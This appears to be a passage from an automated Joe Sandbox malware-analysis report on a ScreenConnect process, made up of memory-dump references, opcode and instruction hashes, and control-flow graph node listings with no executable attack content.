                                                                      • Instruction ID: 7a94526b4c7b6ff8d7951336730f26e2bfc3eb6f477e3712f4ca85bdfe74b52a
                                                                      • Opcode Fuzzy Hash: 0e3869b95b8131629828107db10feb66ddcbb9d5d96999ceacf5d87d982ca36c
                                                                      • Instruction Fuzzy Hash: B5D05E393402209FD304DB69DA45D6577E99F89614B15C0A5E908DB362C9A1EC028AD0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f5d279472e03f70bca88cb6b05e59d70bd4486101a920ec904adfdd64dede85
                                                                      • Instruction ID: 65a088f3d42f526daa841f1d9ab8e88c29e6f9d571ccec6df27e718417d2e1a8
                                                                      • Opcode Fuzzy Hash: 6f5d279472e03f70bca88cb6b05e59d70bd4486101a920ec904adfdd64dede85
                                                                      • Instruction Fuzzy Hash: C5E0CDB1D4428EDFC701DB20E9849587B72EB4134CF1441D9C4449B162DB714F59D740
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a5a0b0d04136aec0fc36bd5a1284f949fd4f5f3eba49a54a19733762a677950
                                                                      • Instruction ID: 966d01d33c3520dd59245b446e6addd4a2d0b3c3ffcda8c133aab7d39f0cd0cb
                                                                      • Opcode Fuzzy Hash: 0a5a0b0d04136aec0fc36bd5a1284f949fd4f5f3eba49a54a19733762a677950
                                                                      • Instruction Fuzzy Hash: C2D01270901209EF8B00DFA5D94055DBBF5EB45204B1045A99808E7241DA316E049741
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e38518d3be5896a1ebca5b82f3149eaabffc8145bf3c34b1182b79e5380abda5
                                                                      • Instruction ID: 81964a9cddb6407fa3d7ba1ce967c706bf7f62ccc021ea7703f49ab34759b211
                                                                      • Opcode Fuzzy Hash: e38518d3be5896a1ebca5b82f3149eaabffc8145bf3c34b1182b79e5380abda5
                                                                      • Instruction Fuzzy Hash: 60D09E3AB40515CF8B14CA59E48049973F5EB8C25571481A5E51AD7324D731ED168B40
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58fbe00344118a3e706f7800748584b8a8c1359a52c7edbf4de40661265fbe7e
                                                                      • Instruction ID: 5779a14e094d58ef0e2dd9ff7c82f76fc190bfacafec461dda5bbfab43a645cd
                                                                      • Opcode Fuzzy Hash: 58fbe00344118a3e706f7800748584b8a8c1359a52c7edbf4de40661265fbe7e
                                                                      • Instruction Fuzzy Hash: A0D01770A41108EF8B40DFA4FA8069DBBB5EB44204B104AA8D80CE7244EA716F46AB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f947cebdf85c9cc24bce3a87bbc3250d97fa8b2be8cd98580056aa388c38e5c6
                                                                      • Instruction ID: 27a69951ec26f1ed7e17519c013f724255a68d57bfdf0abe1b9fc5c94054ec95
                                                                      • Opcode Fuzzy Hash: f947cebdf85c9cc24bce3a87bbc3250d97fa8b2be8cd98580056aa388c38e5c6
                                                                      • Instruction Fuzzy Hash: 70D01770A40208EF8B40DFA8FA4069DB7F9EB44204B104AA8D808E7244EA716E45AB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89024087c727a773782e2ce21f45849f1c49f845307226bc435a1e10d58af21f
                                                                      • Instruction ID: 60e228e9382ea86e31364802562d3678810208368caaef96f32692d5faada132
                                                                      • Opcode Fuzzy Hash: 89024087c727a773782e2ce21f45849f1c49f845307226bc435a1e10d58af21f
                                                                      • Instruction Fuzzy Hash: 34D05BB0D0010DEFCB00DFB4E94055DF7F5EB44204B1086A9D808E7350DB71AF049B50
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5773bfc4a66ad52b948f9057d12e93e6d5ce2065293d664a20d0f66a5eb03a0
                                                                      • Instruction ID: df9cda519fb46ba93011475ebffa7c974872414fdfd013fa62417ac10a8797bc
                                                                      • Opcode Fuzzy Hash: d5773bfc4a66ad52b948f9057d12e93e6d5ce2065293d664a20d0f66a5eb03a0
                                                                      • Instruction Fuzzy Hash: 13D05E31810709DEC704FFA8D2541A87BB0EF95300F04DA4FE28A6A130EB709296DA85
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cac325c3fcb666fd5a518dd5c5bdf36892506dfbbd0d5250e137de60f6faab04
                                                                      • Instruction ID: af07eeedb259910c7b8abd13020c23b2aa141be7ad972ba86d1933f89d32815d
                                                                      • Opcode Fuzzy Hash: cac325c3fcb666fd5a518dd5c5bdf36892506dfbbd0d5250e137de60f6faab04
                                                                      • Instruction Fuzzy Hash: 0AD0C932814B0D8AC700BBB8D4544A9B7B8EED5310F04DA5BE88A67121FFB0E6D0D681
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b703223dc3bd9cdfc531505236631b45d353d1df1c5d9f7b8804d6675366207f
                                                                      • Instruction ID: cca5e132e6724e6043a078c7a1f06141101887a5a45a93b6146bb34dc6a95526
                                                                      • Opcode Fuzzy Hash: b703223dc3bd9cdfc531505236631b45d353d1df1c5d9f7b8804d6675366207f
                                                                      • Instruction Fuzzy Hash: 47C04C6240D7D25FDF03D738A5B6655BF74AD8320475944D9D0D28F053DA18096AC752
                                                                      APIs
                                                                      • RtlGetVersion.NTDLL(0000009C), ref: 013F4DBE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2961097757.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_13f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID: `Q^q
                                                                      • API String ID: 1889659487-1948671464
                                                                      • Opcode ID: 6f523bd233f6f53d7ff8d36dcb77d0e1e2f6d7b22b47f7e4fa8feca9ee8ae121
                                                                      • Instruction ID: ff80f51e9a94eb652201e11b8c46667f2c7075e3b955a97ffe072088c7619b9f
                                                                      • Opcode Fuzzy Hash: 6f523bd233f6f53d7ff8d36dcb77d0e1e2f6d7b22b47f7e4fa8feca9ee8ae121
                                                                      • Instruction Fuzzy Hash: 01210775A00228DFEB648F19CC54B9AFBB9FB05314F0081D9E61CA7240C7756A98CF92

                                                                      Execution Graph

                                                                      Execution Coverage:12.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:5
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 13199 7ffd9b3e8014 13201 7ffd9b3e801d 13199->13201 13200 7ffd9b3e8082 13201->13200 13202 7ffd9b3e80f6 SetProcessMitigationPolicy 13201->13202 13203 7ffd9b3e8152 13202->13203

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 341 7ffd9b6f6d9e-7ffd9b6f6e2c 353 7ffd9b6f6e76-7ffd9b6f6e86 341->353 354 7ffd9b6f6e2e-7ffd9b6f6e4a 341->354 360 7ffd9b6f6e8c-7ffd9b6f6e9a call 7ffd9b6f00f0 353->360 361 7ffd9b6f6e88-7ffd9b6f6e8a 353->361 355 7ffd9b6f7258-7ffd9b6f7276 call 7ffd9b6f0c30 * 2 354->355 356 7ffd9b6f6e50-7ffd9b6f6e6e call 7ffd9b6f0c30 * 2 354->356 374 7ffd9b6f727c-7ffd9b6f7283 355->374 375 7ffd9b6f7382-7ffd9b6f738d 355->375 371 7ffd9b6f6e74-7ffd9b6f6e75 356->371 372 7ffd9b6f70ee-7ffd9b6f710c call 7ffd9b6f0c30 * 2 356->372 364 7ffd9b6f6e9d-7ffd9b6f6eb2 360->364 361->364 377 7ffd9b6f6eb8-7ffd9b6f6edc call 7ffd9b6f54d8 * 2 364->377 378 7ffd9b6f6eb4-7ffd9b6f6eb6 364->378 371->353 394 7ffd9b6f7136-7ffd9b6f7165 call 7ffd9b6f0c30 * 2 372->394 395 7ffd9b6f710e-7ffd9b6f7118 372->395 379 7ffd9b6f7285-7ffd9b6f7294 374->379 380 7ffd9b6f7296-7ffd9b6f7298 374->380 383 7ffd9b6f6edf-7ffd9b6f6ef4 377->383 378->383 379->380 389 7ffd9b6f729a 379->389 382 7ffd9b6f729f-7ffd9b6f72c3 380->382 398 7ffd9b6f72c5-7ffd9b6f72e2 382->398 399 7ffd9b6f730f-7ffd9b6f733f 382->399 396 7ffd9b6f6efa-7ffd9b6f6f1e call 7ffd9b6f54d8 * 2 383->396 397 7ffd9b6f6ef6-7ffd9b6f6ef8 383->397 389->382 439 7ffd9b6f716b-7ffd9b6f717a call 7ffd9b6f00f0 394->439 440 7ffd9b6f7167-7ffd9b6f7169 394->440 400 7ffd9b6f712c 395->400 401 7ffd9b6f711a-7ffd9b6f712a 395->401 402 7ffd9b6f6f21-7ffd9b6f6f36 396->402 397->402 409 7ffd9b6f72e8-7ffd9b6f730d 398->409 410 7ffd9b6f738e-7ffd9b6f7407 398->410 441 7ffd9b6f7345-7ffd9b6f7354 call 7ffd9b6f00f0 399->441 442 7ffd9b6f7341-7ffd9b6f7343 399->442 407 7ffd9b6f712e-7ffd9b6f712f 400->407 401->407 420 7ffd9b6f6f3c-7ffd9b6f6f5f call 7ffd9b6f54d8 402->420 421 7ffd9b6f6f38-7ffd9b6f6f3a 402->421 407->394 409->399 431 7ffd9b6f7409-7ffd9b6f744d 410->431 432 7ffd9b6f7450-7ffd9b6f74a6 410->432 427 7ffd9b6f6f63-7ffd9b6f6f71 420->427 421->427 437 7ffd9b6f6f77-7ffd9b6f6f85 call 7ffd9b6f00f0 427->437 438 7ffd9b6f6f73-7ffd9b6f6f75 427->438 488 7ffd9b6f744e 431->488 462 7ffd9b6f74ac-7ffd9b6f74d0 432->462 463 7ffd9b6f74a8-7ffd9b6f74a9 432->463 444 7ffd9b6f6f88-7ffd9b6f6f91 437->444 438->444 445 7ffd9b6f717d-7ffd9b6f71c1 439->445 440->445 448 7ffd9b6f7357-7ffd9b6f735e 441->448 442->448 469 7ffd9b6f6f98-7ffd9b6f6f9f 444->469 465 7ffd9b6f71c3-7ffd9b6f71cb 445->465 466 7ffd9b6f71d4-7ffd9b6f71dc 445->466 456 7ffd9b6f7373-7ffd9b6f7374 448->456 457 7ffd9b6f7360-7ffd9b6f7371 448->457 459 7ffd9b6f7376-7ffd9b6f737b 456->459 457->456 457->459 459->375 482 7ffd9b6f7502-7ffd9b6f750b 462->482 483 7ffd9b6f74d2-7ffd9b6f74e1 462->483 463->462 470 7ffd9b6f71dd-7ffd9b6f71de 465->470 472 7ffd9b6f71cd-7ffd9b6f71d2 465->472 466->470 471 7ffd9b6f71ee 466->471 469->372 475 7ffd9b6f6fa5-7ffd9b6f6fac 469->475 476 7ffd9b6f71e3-7ffd9b6f71ed call 7ffd9b6f6a80 470->476 478 7ffd9b6f71f4-7ffd9b6f7216 471->478 472->476 475->372 480 7ffd9b6f6fb2-7ffd9b6f6fc9 475->480 476->478 491 7ffd9b6f721c-7ffd9b6f722b call 7ffd9b6f00f0 478->491 492 7ffd9b6f7218-7ffd9b6f721a 478->492 493 7ffd9b6f6fcb-7ffd9b6f6fdd 480->493 494 7ffd9b6f6ffe-7ffd9b6f7009 480->494 486 7ffd9b6f74e7-7ffd9b6f7501 483->486 487 7ffd9b6f74e3-7ffd9b6f74e4 483->487 487->486 488->488 496 7ffd9b6f722e-7ffd9b6f7230 491->496 492->496 506 7ffd9b6f6fe3-7ffd9b6f6ff1 call 7ffd9b6f00f0 493->506 507 7ffd9b6f6fdf-7ffd9b6f6fe1 493->507 504 7ffd9b6f700b-7ffd9b6f700d 494->504 505 7ffd9b6f700f-7ffd9b6f701e call 7ffd9b6f00f0 494->505 496->375 498 7ffd9b6f7236-7ffd9b6f7257 496->498 510 7ffd9b6f7021-7ffd9b6f7023 504->510 505->510 512 7ffd9b6f6ff4-7ffd9b6f6ff7 506->512 507->512 514 7ffd9b6f7029-7ffd9b6f7040 510->514 515 7ffd9b6f70d8-7ffd9b6f70ea 510->515 512->494 514->515 520 7ffd9b6f7046-7ffd9b6f7063 514->520 515->372 523 7ffd9b6f7065-7ffd9b6f706d 520->523 524 7ffd9b6f706f 520->524 525 7ffd9b6f7071-7ffd9b6f7073 523->525 524->525 525->515 527 7ffd9b6f7075-7ffd9b6f707f 525->527 528 7ffd9b6f7081-7ffd9b6f708b call 7ffd9b6f1760 527->528 529 7ffd9b6f708d-7ffd9b6f7095 527->529 528->372 528->529 531 7ffd9b6f7097-7ffd9b6f70bc call 7ffd9b6f5358 529->531 532 7ffd9b6f70c3-7ffd9b6f70d6 call 7ffd9b6f5500 529->532 531->532 532->372
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 1aefdf2c3aea5dcae059924b4234fabdf65201dc30f2a7e6e20ea2454943fc98
                                                                      • Instruction ID: 5c657faf755f56d30c80a44237090e46042d011f1420b77c16032f124fd08555
                                                                      • Opcode Fuzzy Hash: 1aefdf2c3aea5dcae059924b4234fabdf65201dc30f2a7e6e20ea2454943fc98
                                                                      • Instruction Fuzzy Hash: F0320932B1EA4E4BE7B5E7A884756B97BD2EF94300F16407AD06DCB1E3DD28B9058341

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 836 7ffd9b6f00f5-7ffd9b6f0149 843 7ffd9b6f014b-7ffd9b6f0180 836->843 844 7ffd9b6f018e-7ffd9b6f0190 836->844 856 7ffd9b6f01b3-7ffd9b6f01c0 843->856 858 7ffd9b6f0182-7ffd9b6f018b 843->858 846 7ffd9b6f01c4-7ffd9b6f0249 844->846 847 7ffd9b6f0192-7ffd9b6f01b1 844->847 870 7ffd9b6f024b-7ffd9b6f0286 846->870 871 7ffd9b6f028d-7ffd9b6f02a0 846->871 847->856 856->846 858->844 870->871 873 7ffd9b6f02a2-7ffd9b6f4a86 871->873 874 7ffd9b6f02df-7ffd9b6f03d9 871->874 884 7ffd9b6f4a88-7ffd9b6f4aa9 873->884 885 7ffd9b6f4ab1-7ffd9b6f4ae4 873->885 927 7ffd9b6f041b-7ffd9b6f0441 874->927 928 7ffd9b6f03db-7ffd9b6f0419 874->928 884->885 887 7ffd9b6f4aea-7ffd9b6f4b06 885->887 888 7ffd9b6f4c24-7ffd9b6f4c53 885->888 887->888 902 7ffd9b6f4b0c-7ffd9b6f4bc6 887->902 892 7ffd9b6f4c55-7ffd9b6f4c5f call 7ffd9b6f1760 888->892 893 7ffd9b6f4ca4-7ffd9b6f4cb8 888->893 892->893 904 7ffd9b6f4c61-7ffd9b6f4c73 892->904 896 7ffd9b6f4cba-7ffd9b6f4cc4 893->896 897 7ffd9b6f4ce8-7ffd9b6f4cf3 893->897 896->897 901 7ffd9b6f4cc6-7ffd9b6f4cd7 896->901 901->897 911 7ffd9b6f4cd9-7ffd9b6f4ce1 901->911 902->888 933 7ffd9b6f4bc8-7ffd9b6f4bd8 902->933 904->893 906 7ffd9b6f4c75-7ffd9b6f4c9f call 7ffd9b6f1770 904->906 906->893 911->897 940 7ffd9b6f0483-7ffd9b6f048e 927->940 941 7ffd9b6f0443-7ffd9b6f0468 927->941 928->927 933->888 935 7ffd9b6f4bda-7ffd9b6f4c1f call 7ffd9b6f1750 933->935 935->888 943 7ffd9b6f04d8-7ffd9b6f0500 940->943 944 7ffd9b6f0490-7ffd9b6f04b9 940->944 949 7ffd9b6f04ba-7ffd9b6f04c6 941->949 950 7ffd9b6f046a-7ffd9b6f0482 941->950 956 7ffd9b6f0524-7ffd9b6f053c 943->956 957 7ffd9b6f0502-7ffd9b6f0521 943->957 944->949 950->940 964 7ffd9b6f0560-7ffd9b6f057e 956->964 965 7ffd9b6f053e-7ffd9b6f055d 956->965 957->956 968 7ffd9b6f059a 964->968 969 7ffd9b6f0580-7ffd9b6f0590 964->969 965->964 971 7ffd9b6f059f-7ffd9b6f05a5 968->971 974 7ffd9b6f0597-7ffd9b6f0598 969->974 972 7ffd9b6f05ab-7ffd9b6f05b4 971->972 973 7ffd9b6f063e-7ffd9b6f0641 971->973 975 7ffd9b6f05b6-7ffd9b6f05c3 972->975 976 7ffd9b6f05cd-7ffd9b6f05d8 972->976 977 7ffd9b6f0698-7ffd9b6f06ab call 7ffd9b6f00d0 * 2 973->977 978 7ffd9b6f0643-7ffd9b6f064d 973->978 974->968 975->976 985 7ffd9b6f05c5-7ffd9b6f05cb 975->985 981 7ffd9b6f05da-7ffd9b6f05f7 976->981 982 7ffd9b6f0624-7ffd9b6f062d 976->982 992 7ffd9b6f06b0-7ffd9b6f06b6 977->992 986 7ffd9b6f0655-7ffd9b6f066e 978->986 990 7ffd9b6f08e2-7ffd9b6f093f 981->990 991 7ffd9b6f05fd-7ffd9b6f0622 981->991 983 7ffd9b6f062e-7ffd9b6f0632 982->983 983->973 985->976 998 7ffd9b6f06df-7ffd9b6f06ea 986->998 999 7ffd9b6f0670-7ffd9b6f0672 986->999 1034 7ffd9b6f094b-7ffd9b6f0952 990->1034 1035 7ffd9b6f0941-7ffd9b6f094a 990->1035 991->982 996 7ffd9b6f06ba-7ffd9b6f06c6 992->996 997 7ffd9b6f0800-7ffd9b6f081e call 7ffd9b6f00d0 * 2 992->997 1003 7ffd9b6f06cc-7ffd9b6f06da call 7ffd9b6f00f0 996->1003 1004 7ffd9b6f06c8-7ffd9b6f06ca 996->1004 1029 7ffd9b6f0824-7ffd9b6f082e 997->1029 1030 7ffd9b6f08bd-7ffd9b6f08df 997->1030 1007 7ffd9b6f06eb-7ffd9b6f06ec 998->1007 1005 7ffd9b6f0674 999->1005 1006 7ffd9b6f06ee-7ffd9b6f06fa 999->1006 1011 7ffd9b6f06dd-7ffd9b6f06de 1003->1011 1004->1011 1005->996 1013 7ffd9b6f0676-7ffd9b6f067a 1005->1013 1014 7ffd9b6f06fc-7ffd9b6f06fe 1006->1014 1015 7ffd9b6f0700-7ffd9b6f0701 1006->1015 1007->1006 1011->998 1013->1007 1020 7ffd9b6f067c-7ffd9b6f0681 1013->1020 1016 7ffd9b6f0711-7ffd9b6f0715 1014->1016 1017 7ffd9b6f0702-7ffd9b6f070e call 7ffd9b6f00f0 1015->1017 1023 7ffd9b6f0716-7ffd9b6f072e 1016->1023 1017->1016 1020->1017 1026 7ffd9b6f0683-7ffd9b6f068e 1020->1026 1040 7ffd9b6f0734-7ffd9b6f0742 call 7ffd9b6f00f0 1023->1040 1041 7ffd9b6f0730-7ffd9b6f0732 1023->1041 1031 7ffd9b6f06ff 1026->1031 1032 7ffd9b6f0690-7ffd9b6f0695 1026->1032 1036 7ffd9b6f0834-7ffd9b6f0842 call 7ffd9b6f00f0 1029->1036 1037 7ffd9b6f0830-7ffd9b6f0832 1029->1037 1030->990 1031->1015 1032->1023 1039 7ffd9b6f0697 1032->1039 1042 7ffd9b6f0954-7ffd9b6f095d 1034->1042 1043 7ffd9b6f095e-7ffd9b6f0969 1034->1043 1044 7ffd9b6f0845-7ffd9b6f0862 1036->1044 1037->1044 1039->977 1046 7ffd9b6f0745-7ffd9b6f0762 1040->1046 1041->1046 1052 7ffd9b6f0868-7ffd9b6f0876 call 7ffd9b6f00f0 1044->1052 1053 7ffd9b6f0864-7ffd9b6f0866 1044->1053 1055 7ffd9b6f0768-7ffd9b6f0776 call 7ffd9b6f00f0 1046->1055 1056 7ffd9b6f0764-7ffd9b6f0766 1046->1056 1057 7ffd9b6f0879-7ffd9b6f0896 1052->1057 1053->1057 1059 7ffd9b6f0779-7ffd9b6f078f 1055->1059 1056->1059 1065 7ffd9b6f089c-7ffd9b6f08aa call 7ffd9b6f00f0 1057->1065 1066 7ffd9b6f0898-7ffd9b6f089a 1057->1066 1067 7ffd9b6f07a6-7ffd9b6f07ad 1059->1067 1068 7ffd9b6f0791-7ffd9b6f07a4 call 7ffd9b6f00f0 1059->1068 1069 7ffd9b6f08ad-7ffd9b6f08b6 1065->1069 1066->1069 1074 7ffd9b6f07b4-7ffd9b6f07c7 1067->1074 1068->1067 1075 7ffd9b6f07cd-7ffd9b6f07d0 1068->1075 1069->1030 1074->1075 1076 7ffd9b6f07e7-7ffd9b6f07fa 1075->1076 1077 7ffd9b6f07d2-7ffd9b6f07e5 call 7ffd9b6f00f0 1075->1077 1076->997 1077->997 1077->1076
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a409bcb8f8fa0d12b577b328d61c418f7eddba381e4281b9b3711b411e8e068c
                                                                      • Instruction ID: 42d2d7ed879298577be9c7aafd965b192b2181006a0bb7587b4dcf980e6aae0f
                                                                      • Opcode Fuzzy Hash: a409bcb8f8fa0d12b577b328d61c418f7eddba381e4281b9b3711b411e8e068c
                                                                      • Instruction Fuzzy Hash: 96921636B0EA4A4FEBA9EF6C84B16A03BE1FF55700B1501BAD069CF1A7DD15F9428740

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1225 7ffd9b6f5bc1-7ffd9b6f5bf4 call 7ffd9b6f4340 call 7ffd9b6f0c30 * 2 1233 7ffd9b6f5bfa-7ffd9b6f5c08 1225->1233 1234 7ffd9b6f698e-7ffd9b6f69a1 1225->1234 1236 7ffd9b6f5c0a-7ffd9b6f5c0c 1233->1236 1237 7ffd9b6f5c0e-7ffd9b6f5c1d call 7ffd9b6f00f0 1233->1237 1238 7ffd9b6f5c20-7ffd9b6f5c22 1236->1238 1237->1238 1241 7ffd9b6f5c28-7ffd9b6f5c44 1238->1241 1242 7ffd9b6f5d62-7ffd9b6f5d65 1238->1242 1241->1242 1261 7ffd9b6f5c4a-7ffd9b6f5c5c 1241->1261 1243 7ffd9b6f5d6b-7ffd9b6f5d76 1242->1243 1244 7ffd9b6f5ea0-7ffd9b6f5ea7 1242->1244 1248 7ffd9b6f5d78-7ffd9b6f5d95 1243->1248 1249 7ffd9b6f5dc2-7ffd9b6f5dd1 1243->1249 1245 7ffd9b6f5f37-7ffd9b6f5f3e 1244->1245 1246 7ffd9b6f5ead-7ffd9b6f5eb4 1244->1246 1250 7ffd9b6f5f49-7ffd9b6f5f5c 1245->1250 1251 7ffd9b6f5f40-7ffd9b6f5f47 1245->1251 1246->1245 1253 7ffd9b6f5eba-7ffd9b6f5ec4 1246->1253 1257 7ffd9b6f69ab-7ffd9b6f69bc 1248->1257 1258 7ffd9b6f5d9b-7ffd9b6f5dc0 1248->1258 1249->1244 1266 7ffd9b6f5f6d-7ffd9b6f5f75 1250->1266 1267 7ffd9b6f5f5e-7ffd9b6f5f63 1250->1267 1251->1250 1255 7ffd9b6f5f86-7ffd9b6f5f8d 1251->1255 1253->1255 1268 7ffd9b6f5ec8-7ffd9b6f5eff 1253->1268 1262 7ffd9b6f5f93-7ffd9b6f5f9a 1255->1262 1263 7ffd9b6f61f1-7ffd9b6f61f8 1255->1263 1300 7ffd9b6f69bd-7ffd9b6f69c5 1257->1300 1258->1249 1269 7ffd9b6f5caa-7ffd9b6f5cdd 1261->1269 1270 7ffd9b6f5c5e-7ffd9b6f5c69 1261->1270 1262->1263 1271 7ffd9b6f5fa0-7ffd9b6f5fa3 1262->1271 1263->1234 1265 7ffd9b6f61fe-7ffd9b6f6205 1263->1265 1265->1234 1276 7ffd9b6f620b-7ffd9b6f621d 1265->1276 1277 7ffd9b6f5f7b-7ffd9b6f5f7f 1266->1277 1278 7ffd9b6f69e1-7ffd9b6f6aa3 1266->1278 1267->1266 1310 7ffd9b6f5f01-7ffd9b6f5f35 1268->1310 1304 7ffd9b6f5cde-7ffd9b6f5cf0 1269->1304 1281 7ffd9b6f5fac-7ffd9b6f5fba 1271->1281 1282 7ffd9b6f5fa5-7ffd9b6f5fa7 1271->1282 1285 7ffd9b6f6269-7ffd9b6f6277 1276->1285 1286 7ffd9b6f621f-7ffd9b6f623c 1276->1286 1277->1255 1369 7ffd9b6f6aac-7ffd9b6f6ad1 1278->1369 1297 7ffd9b6f5fbc 1281->1297 1298 7ffd9b6f5fbe 1281->1298 1283 7ffd9b6f605a-7ffd9b6f605d 1282->1283 1290 7ffd9b6f6066-7ffd9b6f6074 1283->1290 1291 7ffd9b6f605f-7ffd9b6f6061 1283->1291 1285->1234 1301 7ffd9b6f6242-7ffd9b6f6267 1286->1301 1302 7ffd9b6f69cf-7ffd9b6f69e0 1286->1302 1317 7ffd9b6f6078 1290->1317 1318 7ffd9b6f6076 1290->1318 1299 7ffd9b6f6115-7ffd9b6f611b 1291->1299 1305 7ffd9b6f5fc0-7ffd9b6f5fc3 1297->1305 1298->1305 1307 7ffd9b6f6121-7ffd9b6f6123 1299->1307 1308 7ffd9b6f61cd-7ffd9b6f61cf 1299->1308 1332 7ffd9b6f69c6-7ffd9b6f69ce 1300->1332 1301->1285 1302->1278 1304->1242 1325 7ffd9b6f5cf2-7ffd9b6f5d30 1304->1325 1315 7ffd9b6f5fc5-7ffd9b6f5fcb 1305->1315 1316 7ffd9b6f5fcd-7ffd9b6f5fd8 1305->1316 1307->1308 1319 7ffd9b6f6129-7ffd9b6f615d 1307->1319 1308->1263 1313 7ffd9b6f61d1-7ffd9b6f61d9 1308->1313 1310->1255 1313->1263 1324 7ffd9b6f61db-7ffd9b6f61ee 1313->1324 1326 7ffd9b6f6048-7ffd9b6f6058 1315->1326 1327 7ffd9b6f5fda-7ffd9b6f5ff7 1316->1327 1328 7ffd9b6f6024-7ffd9b6f6045 1316->1328 1329 7ffd9b6f607a-7ffd9b6f607d 1317->1329 1318->1329 1324->1263 1325->1304 1341 7ffd9b6f5d32-7ffd9b6f5d45 1325->1341 1326->1283 1327->1300 1342 7ffd9b6f5ffd-7ffd9b6f6022 1327->1342 1328->1326 1338 7ffd9b6f6087-7ffd9b6f6092 1329->1338 1339 7ffd9b6f607f-7ffd9b6f6085 1329->1339 1332->1302 1344 7ffd9b6f6094-7ffd9b6f60b1 1338->1344 1345 7ffd9b6f60de-7ffd9b6f6100 1338->1345 1343 7ffd9b6f6103-7ffd9b6f6113 1339->1343 1342->1328 1343->1299 1344->1332 1353 7ffd9b6f60b7-7ffd9b6f60dc 1344->1353 1345->1343 1353->1345
                                                                      Memory Dump Source
